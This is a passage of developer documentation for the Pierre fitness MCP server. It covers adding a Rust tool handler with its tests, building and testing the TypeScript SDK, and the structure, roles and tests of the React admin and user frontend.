Self::YourNewTool => YOUR_NEW_TOOL,
}
}
}
3e. Add to description():
#![allow(unused)]
fn main() {
pub const fn description(&self) -> &'static str {
match self {
// ... existing matches ...
Self::YourNewTool => "Your tool description",
}
}
}
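Steps 3c and 3d must stay in sync: `from_name(id.name())` must return the same variant for every tool, or lookups silently fail. The invariant can be checked with a miniature model like the one below (a two-variant stand-in, not Pierre's real enum):

```rust
// Miniature stand-ins for the constants in src/constants/tools/identifiers.rs.
const GET_ACTIVITIES: &str = "get_activities";
const YOUR_NEW_TOOL: &str = "your_new_tool";

#[derive(Debug, Clone, Copy, PartialEq)]
enum ToolId {
    GetActivities,
    YourNewTool,
}

impl ToolId {
    fn from_name(name: &str) -> Option<Self> {
        match name {
            GET_ACTIVITIES => Some(Self::GetActivities),
            YOUR_NEW_TOOL => Some(Self::YourNewTool),
            _ => None,
        }
    }

    const fn name(&self) -> &'static str {
        match self {
            Self::GetActivities => GET_ACTIVITIES,
            Self::YourNewTool => YOUR_NEW_TOOL,
        }
    }
}

fn main() {
    // Round-trip invariant: forgetting either match arm breaks this.
    for id in [ToolId::GetActivities, ToolId::YourNewTool] {
        assert_eq!(ToolId::from_name(id.name()), Some(id));
    }
    assert_eq!(ToolId::from_name("unknown_tool"), None);
}
```

Because both match arms reference the same constant, a typo in one arm but not the other becomes a compile error rather than a runtime mismatch.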
Step 4: Create Handler Function
File: src/protocols/universal/handlers/your_module.rs (or existing file)
#![allow(unused)]
fn main() {
/// Handle `your_new_tool` - description of what it does
///
/// # Arguments
/// * `executor` - Universal executor with database and auth context
/// * `request` - MCP request containing tool parameters
///
/// # Returns
/// JSON response with tool results or error
pub async fn handle_your_new_tool(
executor: Arc<UniversalExecutor>,
request: UniversalRequest,
) -> UniversalResponse {
// Extract parameters
let params = match request.params.as_ref() {
Some(p) => p,
None => return error_response(-32602, "Missing parameters"),
};
// Parse required parameters
let param_name = match params.get("param_name").and_then(|v| v.as_str()) {
Some(p) => p,
None => return error_response(-32602, "Missing required parameter: param_name"),
};
// Get user context
let user_id = match executor.user_id() {
Some(id) => id,
None => return error_response(-32603, "Authentication required"),
};
// Execute business logic
match do_something(user_id, param_name).await {
Ok(result) => success_response(result),
Err(e) => error_response(-32603, &e.to_string()),
}
}
}
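The handler above relies on `success_response` and `error_response` helpers. Their exact shape in Pierre is not shown here; a plausible minimal version, with field names that are assumptions (the real `UniversalResponse` carries JSON payloads), looks like:

```rust
/// Simplified stand-in for Pierre's UniversalResponse; field names are
/// assumptions for illustration, not the actual struct definition.
#[derive(Debug, PartialEq)]
struct UniversalResponse {
    success: bool,
    error_code: Option<i32>,
    message: String,
}

fn success_response(result: String) -> UniversalResponse {
    UniversalResponse { success: true, error_code: None, message: result }
}

fn error_response(code: i32, message: &str) -> UniversalResponse {
    UniversalResponse {
        success: false,
        // JSON-RPC codes: -32602 = invalid params, -32603 = internal error
        error_code: Some(code),
        message: message.to_owned(),
    }
}

fn main() {
    let err = error_response(-32602, "Missing required parameter: param_name");
    assert!(!err.success);
    assert_eq!(err.error_code, Some(-32602));
    let ok = success_response("{\"items\":[]}".to_owned());
    assert!(ok.success && ok.error_code.is_none());
}
```

Using the standard JSON-RPC error codes keeps tool errors consistent with the protocol-level errors MCP clients already understand.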
Step 5: Register in Executor
File: src/protocols/universal/executor.rs
5a. Add import:
#![allow(unused)]
fn main() {
use crate::protocols::universal::handlers::your_module::handle_your_new_tool;
}
5b. Register handler:
#![allow(unused)]
fn main() {
impl UniversalExecutor {
fn register_tools(&mut self) {
// ... existing registrations ...
self.register_handler(
ToolId::YourNewTool,
|executor, request| Box::pin(handle_your_new_tool(executor, request)),
);
}
}
}
Step 6: Add Unit Tests
File: tests/mcp_tools_unit.rs
6a. Add to presence test:
#![allow(unused)]
fn main() {
#[test]
fn test_mcp_tool_schemas() {
let tools = get_tools();
let tool_names: Vec<&str> = tools.iter().map(|t| t.name.as_str()).collect();
// ... existing assertions ...
// Your new tools
assert!(tool_names.contains(&"your_new_tool"));
}
}
6b. Add schema validation test:
#![allow(unused)]
fn main() {
#[test]
fn test_your_new_tool_schema() {
let tools = get_tools();
let tool = tools
.iter()
.find(|t| t.name == "your_new_tool")
.expect("your_new_tool tool should exist");
assert!(tool.description.contains("expected keyword"));
if let Some(required) = &tool.input_schema.required {
assert!(required.contains(&"param_name".to_owned()));
} else {
panic!("your_new_tool should have required parameters");
}
}
}
Step 7: Add to Critical Tools List
File: tests/schema_completeness_test.rs
#![allow(unused)]
fn main() {
#[test]
fn test_critical_tools_are_present() {
let critical_tools = vec![
// ... existing tools ...
"your_new_tool",
];
// ...
}
}
Step 8: Add SDK Tests
File: sdk/test/integration/tool-call-validation.test.js
const toolCallTests = [
// ... existing tests ...
{
name: 'your_new_tool',
description: 'Your tool description',
arguments: { param_name: 'test-value' },
expectedError: null // or /expected error pattern/
},
];
Step 9: Update Documentation
File: docs/tools-reference.md
Add tool to the appropriate category section.
File: docs/tutorial/chapter-19-tools-guide.md
Update tool counts in the overview section.
Step 10: Run Validation
# Format code
cargo fmt
# Run clippy strict mode
cargo clippy --all-targets --quiet -- \
-D warnings -D clippy::all -D clippy::pedantic -D clippy::nursery
# Run targeted tests
cargo test your_new_tool -- --nocapture
cargo test test_mcp_tool_schemas -- --nocapture
cargo test test_recipe_tool_schemas -- --nocapture # if recipe tool
# Run SDK tests
cd sdk && npm test
Common Mistakes to Avoid
1. Forgetting to use constants
#![allow(unused)]
fn main() {
// WRONG - hardcoded string
name: "your_new_tool".to_owned(),
// CORRECT - use constant
name: YOUR_NEW_TOOL.to_owned(),
}
2. Missing from ToolId enum
If you see “Unknown tool” errors, check that your tool is in:
- The ToolId enum variant
- The from_name() match arm
- The name() match arm
3. Not registering handler in executor
Handler must be registered in executor.rs or tools will fail with internal errors.
4. Forgetting to update test counts
Update tool counts in:
- tests/mcp_tools_unit.rs
- tests/configuration_mcp_integration_test.rs
- tests/mcp_multitenant_complete_test.rs
5. Not adding clippy allow in test files
Test files need:
#![allow(clippy::unwrap_used, clippy::expect_used, clippy::panic)]
File Reference Summary
| File | Purpose |
|---|---|
| src/constants/tools/identifiers.rs | Tool name constants |
| src/mcp/schema.rs | Tool schemas for MCP discovery |
| src/protocols/universal/tool_registry.rs | Type-safe ToolId enum |
| src/protocols/universal/handlers/*.rs | Handler implementations |
| src/protocols/universal/executor.rs | Handler registration |
| tests/mcp_tools_unit.rs | Schema validation tests |
| tests/schema_completeness_test.rs | Registry completeness tests |
| sdk/test/integration/tool-call-validation.test.js | SDK integration tests |
| docs/tools-reference.md | Tool documentation |
| docs/tutorial/chapter-19-tools-guide.md | Tool usage guide |
Example: Complete Tool Addition
See the recipe tools implementation for a complete example:
- Constants: src/constants/tools/identifiers.rs (lines 77-90)
- Schemas: src/mcp/schema.rs (search for create_list_recipes_tool)
- ToolId: src/protocols/universal/tool_registry.rs (search for ListRecipes)
- Handlers: src/protocols/universal/handlers/recipes.rs
- Executor: src/protocols/universal/executor.rs (search for handle_list_recipes)
- Tests: tests/mcp_tools_unit.rs (search for test_recipe_tool_schemas)
Chapter 32: SDK Development Tutorial
This chapter provides a hands-on guide to developing and extending the Pierre TypeScript SDK. You’ll learn how to set up your development environment, run tests, generate types, and modify the bridge client.
Development Environment Setup
1. Install Dependencies
cd sdk
npm install
The SDK uses these key dependencies:
- @modelcontextprotocol/sdk: Official MCP SDK for protocol compliance
- @napi-rs/keyring: OS-native secure credential storage
- commander: CLI argument parsing
- ajv: JSON Schema validation
2. Build the SDK
# Production build (esbuild)
npm run build
# Type checking only (no emit)
npm run type-check
# Full TypeScript compilation (for debugging)
npm run build:tsc
Source: sdk/package.json:12-14
{
"scripts": {
"build": "node esbuild.config.mjs",
"build:tsc": "tsc",
"type-check": "tsc --noEmit"
}
}
The esbuild bundler creates optimized production builds in dist/:
- dist/index.js: SDK library entry point
- dist/cli.js: CLI binary
3. Development Mode
For rapid iteration, use tsx to run TypeScript directly:
# Run CLI in development mode
npm run dev
# Or run directly with environment variables
PIERRE_SERVER_URL=http://localhost:8081 npm run dev
SDK Directory Structure
sdk/
├── src/
│ ├── bridge.ts # MCP bridge client (98KB, main logic)
│ ├── cli.ts # CLI wrapper and argument parsing
│ ├── index.ts # SDK entry point and exports
│ ├── secure-storage.ts # OS keychain integration
│ └── types.ts # Auto-generated TypeScript types
├── test/
│ ├── unit/ # Unit tests
│ ├── integration/ # Integration tests
│ ├── e2e/ # End-to-end tests
│ ├── fixtures/ # Test data fixtures
│ └── helpers/ # Test utilities
├── dist/ # Build output
├── package.json # npm configuration
├── tsconfig.json # TypeScript configuration
├── esbuild.config.mjs # Build configuration
└── eslint.config.js # Linting rules
Running Tests
The SDK uses Jest for testing with three test tiers:
Unit Tests
Fast, isolated tests for individual functions:
npm run test:unit
Integration Tests
Tests requiring a running Pierre server:
# Start Pierre server first
cd .. && cargo run --bin pierre-mcp-server &
# Run integration tests
cd sdk && npm run test:integration
End-to-End Tests
Full workflow tests simulating Claude Desktop:
npm run test:e2e
All Tests
npm run test:all
Test configuration (sdk/package.json):
{
"jest": {
"testEnvironment": "node",
"testTimeout": 30000,
"testMatch": ["**/test/**/*.test.js"]
}
}
Legacy Test Scripts
Individual test files for specific scenarios:
# SSE/Streamable HTTP transport test
npm run test:legacy:sse
# Complete E2E Claude Desktop simulation
npm run test:legacy:e2e
# OAuth flow testing
npm run test:legacy:oauth
Type Generation Pipeline
The SDK auto-generates TypeScript types from Pierre server tool schemas.
How It Works
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ Pierre Server │────►│ generate-sdk- │────►│ sdk/src/ │
│ (tools/list) │ │ types.js │ │ types.ts │
└─────────────────┘ └──────────────────┘ └─────────────────┘
▲ │
│ ▼
JSON-RPC JSON Schema → TypeScript
tools/list type conversion
Generate Types
Step 1: Start Pierre server
cd .. && RUST_LOG=warn cargo run --bin pierre-mcp-server
Step 2: Run type generation
cd sdk && npm run generate-types
Source: scripts/generate-sdk-types.js:23-76
async function fetchToolSchemas() {
const requestData = JSON.stringify({
jsonrpc: '2.0',
id: 1,
method: 'tools/list',
params: {}
});
const options = {
hostname: 'localhost',
port: SERVER_PORT,
path: '/mcp',
method: 'POST',
headers: {
'Content-Type': 'application/json',
...(JWT_TOKEN ? { 'Authorization': `Bearer ${JWT_TOKEN}` } : {})
}
};
// ... HTTP request to fetch schemas
}
Type Generation Output
The generator creates sdk/src/types.ts with:
- Parameter interfaces (47 tools):
export interface GetActivitiesParams {
start_date?: string;
end_date?: string;
limit?: number;
provider?: string;
}
- Common data types:
export interface Activity {
id: string;
name: string;
type: string;
distance?: number;
// ... all activity fields
}
- Tool name union:
export type ToolName = "get_activities" | "get_athlete" | ...;
- Type map:
export interface ToolParamsMap {
"get_activities": GetActivitiesParams;
"get_athlete": GetAthleteParams;
// ...
}
When to Regenerate Types
Regenerate types when:
- Adding new tools in the Rust server
- Modifying tool parameter schemas
- Changing tool response structures
# Full regeneration workflow
cargo build --release
./target/release/pierre-mcp-server &
cd sdk && npm run generate-types
npm run build
Modifying the Bridge Client
The bridge client (src/bridge.ts) is the core of the SDK. Here’s how to modify it.
Understanding the Architecture
Source: sdk/src/bridge.ts (structure)
// OAuth client provider for authentication
class PierreOAuthClientProvider implements OAuthClientProvider {
// OAuth flow implementation
}
// Main bridge client
export class PierreMcpClient {
private config: BridgeConfig;
private oauthProvider: PierreOAuthClientProvider;
private mcpClient: Client;
private mcpServer: Server;
async start(): Promise<void> {
// 1. Initialize OAuth provider
// 2. Create MCP client (HTTP to Pierre)
// 3. Create MCP server (stdio to host)
// 4. Connect and start
}
}
Adding a New Configuration Option
- Add to BridgeConfig interface:
// sdk/src/bridge.ts
export interface BridgeConfig {
pierreServerUrl: string;
// ... existing options
myNewOption?: string; // Add here
}
- Use in client logic:
async start(): Promise<void> {
if (this.config.myNewOption) {
// Handle new option
}
}
- Add CLI flag (sdk/src/cli.ts):
program
.option('--my-new-option <value>', 'Description', process.env.MY_NEW_OPTION);
Adding Custom Request Handling
To intercept or modify MCP requests:
// In PierreMcpClient.start()
this.mcpServer.setRequestHandler(ListToolsRequestSchema, async () => {
// Custom handling before forwarding to Pierre
const result = await this.mcpClient.listTools();
// Custom post-processing
return result;
});
Using MCP Inspector
The MCP Inspector is a debugging tool for testing MCP servers:
# Start inspector with SDK CLI
npm run inspect
# Or with explicit CLI arguments
npm run inspect:cli
Source: sdk/package.json:22-23
{
"scripts": {
"inspect": "npx @modelcontextprotocol/inspector node dist/cli.js",
"inspect:cli": "npx @modelcontextprotocol/inspector --cli node dist/cli.js"
}
}
The inspector provides:
- Visual tool listing
- Interactive tool calls
- Request/response logging
- OAuth flow testing
Secure Storage Development
The SDK uses OS-native keychain for token storage.
Source: sdk/src/secure-storage.ts (structure)
export class SecureTokenStorage {
private serviceName: string;
async storeToken(key: string, value: string): Promise<void> {
// Uses @napi-rs/keyring for OS-native storage
}
async getToken(key: string): Promise<string | null> {
// Retrieves from keychain
}
async deleteToken(key: string): Promise<void> {
// Removes from keychain
}
}
Platform support:
- macOS: Keychain (security command)
- Linux: Secret Service (libsecret)
Linting and Code Quality
# Run ESLint
npm run lint
# Type checking
npm run type-check
ESLint configuration: sdk/eslint.config.js
Best Practices
1. Logging to stderr
All debug output must go to stderr to keep stdout clean for MCP JSON-RPC:
// GOOD: stderr for debugging
console.error('[DEBUG] Connection established');
// BAD: stdout pollutes MCP protocol
console.log('Debug message'); // DON'T DO THIS
2. Error Handling
Use structured error handling with proper cleanup:
try {
await this.mcpClient.connect();
} catch (error) {
console.error('Connection failed:', error);
await this.cleanup();
throw error;
}
3. Graceful Shutdown
Always handle SIGINT/SIGTERM for clean process termination:
process.on('SIGINT', () => handleShutdown('SIGINT'));
process.on('SIGTERM', () => handleShutdown('SIGTERM'));
4. Type Safety
Use generated types for all tool calls:
import { GetActivitiesParams, Activity } from './types';
const params: GetActivitiesParams = {
limit: 10,
provider: 'strava'
};
const result = await client.callTool('get_activities', params);
Troubleshooting
“Cannot find module” errors
Rebuild the SDK:
npm run build
Type generation fails
Ensure Pierre server is running and accessible:
curl http://localhost:8081/health
OAuth flow not completing
Check callback port is available:
lsof -i :35535
Tests timing out
Increase Jest timeout in package.json:
{
"jest": {
"testTimeout": 60000
}
}
Key Takeaways
- Node.js 24+: Required for the SDK's JavaScript engine features.
- Type generation: Run npm run generate-types after server tool changes to keep TypeScript types in sync.
- Three test tiers: Unit tests (fast), integration tests (require server), E2E tests (full simulation).
- Secure storage: Uses OS-native keychain via @napi-rs/keyring for token security.
- stderr for logging: Keep stdout clean for MCP JSON-RPC protocol messages.
- MCP Inspector: Use npm run inspect for interactive debugging.
- Bridge architecture: PierreMcpClient translates stdio ↔ HTTP; OAuth is handled by PierreOAuthClientProvider.
- Build system: esbuild for fast production builds, tsx for development.
Next Chapter: Chapter 33: Frontend Development Tutorial - Learn how to develop and extend the Pierre React frontend application.
Chapter 33: Frontend Development Tutorial
This chapter provides a hands-on guide to developing and extending the Pierre React frontend dashboard. You’ll learn how to set up your development environment, understand the component architecture, run tests, and modify the application.
Development Environment Setup
1. Install Dependencies
cd frontend
npm install
Key dependencies:
- React 19.1.0: UI framework with hooks
- TypeScript 5.8.3: Type safety
- Vite 6.4.1: Development server and bundler
- TailwindCSS 3.4.17: Utility-first CSS
- @tanstack/react-query 5.80.7: Server state management
2. Start Development Server
npm run dev
The development server runs at http://localhost:5173 with:
- Hot module replacement (HMR)
- Vite proxy to backend (avoids CORS issues)
- TypeScript checking
3. Build for Production
npm run build
Production build outputs to dist/ directory.
Project Structure
frontend/
├── src/
│ ├── App.tsx # Root component and routing
│ ├── main.tsx # React entry point
│ ├── index.css # Global styles (TailwindCSS)
│ ├── components/ # React components (35+)
│ │ ├── Dashboard.tsx # Main dashboard container
│ │ ├── ChatTab.tsx # AI chat interface (52KB)
│ │ ├── AdminConfiguration.tsx # Admin settings
│ │ ├── UserSettings.tsx # User preferences
│ │ ├── Login.tsx # Authentication
│ │ ├── Register.tsx # User registration
│ │ ├── ui/ # Reusable UI primitives
│ │ └── __tests__/ # Component tests
│ ├── contexts/ # React contexts
│ │ ├── AuthContext.tsx # Authentication state
│ │ ├── WebSocketProvider.tsx # Real-time updates
│ │ └── auth.ts # Auth types
│ ├── services/ # API service layer
│ │ └── api.ts # Axios-based API client
│ ├── hooks/ # Custom React hooks
│ ├── types/ # TypeScript definitions
│ └── firebase/ # Firebase integration
├── e2e/ # Playwright E2E tests (282 tests)
├── integration/ # Integration test config
├── public/ # Static assets
├── tailwind.config.cjs # TailwindCSS configuration
├── vite.config.ts # Vite configuration
└── playwright.config.ts # Playwright configuration
Component Architecture
Root Component (App.tsx)
The root component handles authentication flow and routing:
Source: frontend/src/App.tsx:40-165
function AppContent() {
const { user, isAuthenticated, isLoading } = useAuth();
const [authView, setAuthView] = useState<AuthView>('login');
// OAuth callback handling
useEffect(() => {
const params = getOAuthCallbackParams();
if (params) {
setOauthCallback(params);
// Invalidate queries to refresh connection state
localQueryClient.invalidateQueries({ queryKey: ['oauth-status'] });
}
}, [localQueryClient]);
// Authentication flow
if (!isAuthenticated) {
return authView === 'register' ? <Register /> : <Login />;
}
// User status flow
if (user?.user_status === 'pending') return <PendingApproval />;
if (user?.user_status === 'suspended') return <SuspendedView />;
// Dashboard for active users
return <Dashboard />;
}
Context Providers
The app wraps components with three providers:
function App() {
return (
<QueryClientProvider client={queryClient}>
<AuthProvider>
<WebSocketProvider>
<AppContent />
</WebSocketProvider>
</AuthProvider>
</QueryClientProvider>
);
}
- QueryClientProvider: React Query for server state
- AuthProvider: User authentication and session
- WebSocketProvider: Real-time updates
Dashboard Tabs
The Dashboard component renders different interfaces based on user role:
| Tab | Component | Description |
|---|---|---|
| Home | OverviewTab.tsx | Statistics overview |
| Connections | UnifiedConnections.tsx | A2A clients, API keys |
| MCP Tokens | MCPTokensTab.tsx | Token management |
| Analytics | UsageAnalytics.tsx | Usage charts |
| Monitor | RequestMonitor.tsx | Request logs |
| Settings | UserSettings.tsx | Profile settings |
| Admin | AdminConfiguration.tsx | Admin-only settings |
Admin vs User Mode
Pierre has three user roles that determine the UI experience:
| Role | Access Level | Default Tab |
|---|---|---|
| user | User mode only | Chat |
| admin | Admin + User modes | Overview |
| super_admin | Full access including token management | Overview |
User Mode (Regular Users)
Source: frontend/src/components/Dashboard.tsx:207-248
Regular users see a clean, focused interface:
┌─────────────────────────────────────────────────────────────────┐
│ Pierre Fitness Intelligence │
├─────────────────────────────────────────────────────────────────┤
│ │
│ AI Chat Interface │
│ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ │ │
│ │ Welcome! Ask me about your fitness data. │ │
│ │ │ │
│ │ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │ │
│ │ │ Training │ │ Nutrition │ │ Recovery │ │ │
│ │ │ ⚡ Activity │ │ 🥗 Amber │ │ 💤 Indigo │ │ │
│ │ └─────────────┘ └─────────────┘ └─────────────┘ │ │
│ │ │ │
│ │ [Message input field...] [Send] │ │
│ └──────────────────────────────────────────────────────────┘ │
│ │
│ [⚙️ Settings] │
└─────────────────────────────────────────────────────────────────┘
User mode features:
- Chat Tab: AI conversation with prompt suggestions organized by pillar
- Settings Tab: Access via gear icon in chat header
// Dashboard.tsx - User mode check
if (!isAdminUser) {
return (
<div className="h-screen bg-white flex flex-col overflow-hidden">
{/* Minimal header */}
<header className="h-12 border-b border-pierre-gray-100">
<PierreLogoSmall />
<span>Pierre Fitness Intelligence</span>
</header>
{/* Chat or Settings content */}
<main className="flex-1 overflow-hidden">
{activeTab === 'chat' && <ChatTab onOpenSettings={() => setActiveTab('settings')} />}
{activeTab === 'settings' && <UserSettings />}
</main>
</div>
);
}
User Settings Tabs
Source: frontend/src/components/UserSettings.tsx:45-83
Regular users have access to four settings tabs:
| Tab | Description | Features |
|---|---|---|
| Profile | User identity | Display name, email (read-only), avatar |
| Connections | OAuth credentials | Add/remove Strava, Fitbit, Garmin, WHOOP, Terra credentials |
| API Tokens | MCP tokens | Create/revoke tokens for Claude Desktop, Cursor IDE |
| Account | Account management | Status, role, sign out, danger zone |
const SETTINGS_TABS: { id: SettingsTab; name: string }[] = [
{ id: 'profile', name: 'Profile' },
{ id: 'connections', name: 'Connections' },
{ id: 'tokens', name: 'API Tokens' },
{ id: 'account', name: 'Account' },
];
Admin Mode (Admin/Super Admin)
Source: frontend/src/components/Dashboard.tsx:250-540
Admins see a full sidebar with navigation:
┌──────────────┬──────────────────────────────────────────────────┐
│ │ │
│ [Pierre] │ Overview │
│ │ │
│ Overview ● │ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐│
│ Connections │ │ Total Users │ │ Active Keys │ │ Requests ││
│ Analytics │ │ 127 │ │ 45 │ │ 12,847 ││
│ Monitor │ └─────────────┘ └─────────────┘ └─────────────┘│
│ Tools │ │
│ Users 🔴 │ Weekly Usage Chart │
│ Config │ [═══════════════════════════════════════] │
│ Prompts │ │
│ Settings │ Rate Limits A2A Connections │
│ │ [████████░░] 80% ● Client A Connected │
│ ────────── │ ● Client B Connected │
│ 👤 Admin │ │
│ [Sign out] │ │
│ │ │
└──────────────┴──────────────────────────────────────────────────┘
Admin tabs (9 total):
| Tab | Component | Description |
|---|---|---|
| Overview | OverviewTab.tsx | Dashboard statistics, quick links |
| Connections | UnifiedConnections.tsx | A2A clients, OAuth connections |
| Analytics | UsageAnalytics.tsx | Usage charts, trends |
| Monitor | RequestMonitor.tsx | Real-time request logs |
| Tools | ToolUsageBreakdown.tsx | Tool usage analysis |
| Users | UserManagement.tsx | User list, approve/suspend (badge shows pending count) |
| Configuration | AdminConfiguration.tsx | LLM providers, tenant settings |
| Prompts | PromptsAdminTab.tsx | Manage AI prompts (see Chapter 34) |
| Settings | AdminSettings.tsx | Auto-approval, security settings |
Super admin additional tab:
| Tab | Component | Description |
|---|---|---|
| Admin Tokens | ApiKeyList.tsx / ApiKeyDetails.tsx | System API key management |
// Admin tabs definition
const adminTabs: TabDefinition[] = [
{ id: 'overview', name: 'Overview', icon: <ChartIcon /> },
{ id: 'connections', name: 'Connections', icon: <WifiIcon /> },
{ id: 'analytics', name: 'Analytics', icon: <GraphIcon /> },
{ id: 'monitor', name: 'Monitor', icon: <EyeIcon /> },
{ id: 'tools', name: 'Tools', icon: <GearIcon /> },
{ id: 'users', name: 'Users', icon: <UsersIcon />, badge: pendingUsers.length },
{ id: 'configuration', name: 'Configuration', icon: <SlidersIcon /> },
{ id: 'prompts', name: 'Prompts', icon: <ChatIcon /> },
{ id: 'admin-settings', name: 'Settings', icon: <SettingsIcon /> },
];
// Super admin extends with token management
const superAdminTabs = [
...adminTabs,
{ id: 'admin-tokens', name: 'Admin Tokens', icon: <KeyIcon /> },
];
Role Detection
Source: frontend/src/components/Dashboard.tsx:77-82
const { user, logout } = useAuth();
const isAdminUser = user?.role === 'admin' || user?.role === 'super_admin';
const isSuperAdmin = user?.role === 'super_admin';
// Default tab based on role
const [activeTab, setActiveTab] = useState(isAdminUser ? 'overview' : 'chat');
Admin-Only Features
Users Tab (UserManagement.tsx):
- View all registered users
- Approve pending registrations
- Suspend/unsuspend users
- View user activity details
Configuration Tab (AdminConfiguration.tsx):
- LLM provider selection (OpenAI, Anthropic, etc.)
- Model configuration
- Tenant-specific settings
Prompts Tab (PromptsAdminTab.tsx):
- Manage prompt categories
- Edit welcome message
- Customize system prompt
- Reset to defaults
Settings Tab (AdminSettings.tsx):
- Toggle auto-approval for registrations
- System information display
- Security recommendations
Pending Users Badge
The Users tab shows a red badge when users are pending approval:
const { data: pendingUsers = [] } = useQuery<User[]>({
queryKey: ['pending-users'],
queryFn: () => apiService.getPendingUsers(),
staleTime: 30_000,
enabled: isAdminUser,
});
// In tab definition
{ id: 'users', name: 'Users', badge: pendingUsers.length > 0 ? pendingUsers.length : undefined }
Sidebar Collapse
The admin sidebar can be collapsed for more screen space:
const [sidebarCollapsed, setSidebarCollapsed] = useState(false);
// Collapsed: 72px, Expanded: 260px
<aside className={clsx(
'fixed left-0 top-0 h-screen',
sidebarCollapsed ? 'w-[72px]' : 'w-[260px]'
)}>
Service Layer
API Service (services/api.ts)
The ApiService class centralizes all HTTP communication:
Source: frontend/src/services/api.ts:10-62
class ApiService {
private csrfToken: string | null = null;
constructor() {
axios.defaults.baseURL = API_BASE_URL;
axios.defaults.headers.common['Content-Type'] = 'application/json';
axios.defaults.withCredentials = true;
this.setupInterceptors();
}
private setupInterceptors() {
// Add CSRF token to state-changing requests
axios.interceptors.request.use((config) => {
if (this.csrfToken && ['POST', 'PUT', 'DELETE', 'PATCH'].includes(config.method?.toUpperCase() || '')) {
config.headers['X-CSRF-Token'] = this.csrfToken;
}
return config;
});
// Handle 401 authentication failures
axios.interceptors.response.use(
(response) => response,
async (error) => {
if (error.response?.status === 401) {
this.handleAuthFailure();
}
return Promise.reject(error);
}
);
}
}
Key API Methods
// Authentication
await apiService.login(email, password);
await apiService.loginWithFirebase(idToken);
await apiService.logout();
await apiService.register(email, password, displayName);
// API Keys
await apiService.createApiKey({ name, description, rate_limit_requests });
await apiService.getApiKeys();
await apiService.deactivateApiKey(keyId);
// A2A Clients
await apiService.createA2AClient(data);
await apiService.getA2AClients();
// Admin Operations
await apiService.getPendingUsers();
await apiService.approveUser(userId);
await apiService.suspendUser(userId);
await apiService.startImpersonation(targetUserId, reason);
React Query Integration
Components use React Query for data fetching:
import { useQuery, useMutation, useQueryClient } from '@tanstack/react-query';
function ApiKeyList() {
const queryClient = useQueryClient();
// Fetch API keys
const { data: apiKeys, isLoading } = useQuery({
queryKey: ['api-keys'],
queryFn: () => apiService.getApiKeys(),
});
// Deactivate mutation
const deactivateMutation = useMutation({
mutationFn: (keyId: string) => apiService.deactivateApiKey(keyId),
onSuccess: () => {
queryClient.invalidateQueries({ queryKey: ['api-keys'] });
},
});
return (
<div>
{apiKeys?.map((key) => (
<ApiKeyCard
key={key.id}
apiKey={key}
onDeactivate={() => deactivateMutation.mutate(key.id)}
/>
))}
</div>
);
}
Authentication Context
Source: frontend/src/contexts/AuthContext.tsx:16-187
export function AuthProvider({ children }: { children: React.ReactNode }) {
const [user, setUser] = useState<User | null>(null);
const [token, setToken] = useState<string | null>(null);
const [isLoading, setIsLoading] = useState(true);
const [impersonation, setImpersonation] = useState<ImpersonationState>(...);
const login = async (email: string, password: string) => {
const response = await apiService.login(email, password);
const { access_token, csrf_token, user: userData } = response;
apiService.setCsrfToken(csrf_token);
setToken(access_token);
setUser(userData);
localStorage.setItem('jwt_token', access_token);
};
// Admin impersonation
const startImpersonation = useCallback(async (targetUserId: string) => {
if (user?.role !== 'super_admin') {
throw new Error('Only super admins can impersonate users');
}
const response = await apiService.startImpersonation(targetUserId);
setImpersonation({
isImpersonating: true,
targetUser: response.target_user,
originalUser: user,
});
}, [user]);
return (
<AuthContext.Provider value={{ user, token, login, logout, ... }}>
{children}
</AuthContext.Provider>
);
}
WebSocket Real-Time Updates
The WebSocketProvider enables real-time dashboard updates:
// Connect to WebSocket for live updates
const { connectionStatus, subscribe, lastMessage } = useWebSocket();
// Subscribe to usage updates
useEffect(() => {
subscribe('usage');
subscribe('system');
}, [subscribe]);
// React to real-time messages
useEffect(() => {
if (lastMessage?.type === 'usage_update') {
// Update UI with new usage data
}
}, [lastMessage]);
Adding New Features
1. Create a New Component
// src/components/MyNewFeature.tsx
import { useQuery } from '@tanstack/react-query';
import { apiService } from '../services/api';
export function MyNewFeature() {
const { data, isLoading, error } = useQuery({
queryKey: ['my-feature'],
queryFn: () => apiService.getMyFeatureData(),
});
if (isLoading) return <LoadingSpinner />;
if (error) return <ErrorMessage error={error} />;
return (
<div className="bg-white rounded-lg shadow p-6">
<h2 className="text-lg font-semibold text-pierre-gray-900">
My New Feature
</h2>
{/* Feature content */}
</div>
);
}
2. Add API Method
// src/services/api.ts
async getMyFeatureData() {
const response = await axios.get('/api/my-feature');
return response.data;
}
async updateMyFeature(data: MyFeatureData) {
const response = await axios.put('/api/my-feature', data);
return response.data;
}
3. Add to Dashboard
// src/components/Dashboard.tsx
import { MyNewFeature } from './MyNewFeature';
// Add to tabs array
const tabs = [
// ... existing tabs
{ id: 'my-feature', label: 'My Feature', component: MyNewFeature },
];
Testing
Unit Tests (Vitest)
# Run tests in watch mode
npm test
# Run with UI
npm run test:ui
# Run with coverage
npm run test:coverage
Test example (frontend/src/components/tests/):
import { render, screen, fireEvent } from '@testing-library/react';
import { describe, it, expect, vi } from 'vitest';
import { Login } from '../Login';
describe('Login', () => {
it('submits login form', async () => {
const mockLogin = vi.fn();
render(<Login onLogin={mockLogin} />);
fireEvent.change(screen.getByLabelText(/email/i), {
target: { value: 'test@example.com' },
});
fireEvent.change(screen.getByLabelText(/password/i), {
target: { value: 'password123' },
});
fireEvent.click(screen.getByRole('button', { name: /sign in/i }));
expect(mockLogin).toHaveBeenCalledWith('test@example.com', 'password123');
});
});
E2E Tests (Playwright)
The E2E suite covers 282 tests across 13 spec files:
# Run all E2E tests
npm run test:e2e
# Run with Playwright UI
npm run test:e2e:ui
# Run in headed mode (visible browser)
npm run test:e2e:headed
# Run specific test file
npx playwright test e2e/connections.spec.ts
Test structure (e2e/):
import { test, expect } from '@playwright/test';
import { setupDashboardMocks, loginToDashboard, navigateToTab } from './test-helpers';
test.describe('API Keys', () => {
test.beforeEach(async ({ page }) => {
await setupDashboardMocks(page, { role: 'admin' });
await loginToDashboard(page);
await navigateToTab(page, 'Connections');
});
test('creates new API key', async ({ page }) => {
await page.click('[data-testid="create-api-key"]');
await page.fill('[name="name"]', 'Test Key');
await page.click('[type="submit"]');
await expect(page.locator('.success-message')).toBeVisible();
});
});
Integration Tests
npm run test:integration
npm run test:integration:ui
Pierre Design System
Color Palette
